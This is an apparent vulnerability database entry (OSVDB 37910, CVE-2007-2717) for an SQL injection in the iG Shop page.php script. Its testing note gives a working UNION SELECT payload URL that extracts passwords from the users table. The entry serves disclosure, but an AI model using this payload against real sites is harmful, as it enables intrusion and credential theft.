iG Shop shop/page.php type_id[] Variable SQL Injection

2007-05-12T00:00:00
ID OSVDB:37910
Type osvdb
Reporter OSVDB
Modified 2007-05-12T00:00:00

Description

Manual Testing Notes

http://[target]/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union//select//password//from//users/*

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/3907
CVE-2007-2717
Bugtraq ID: 23949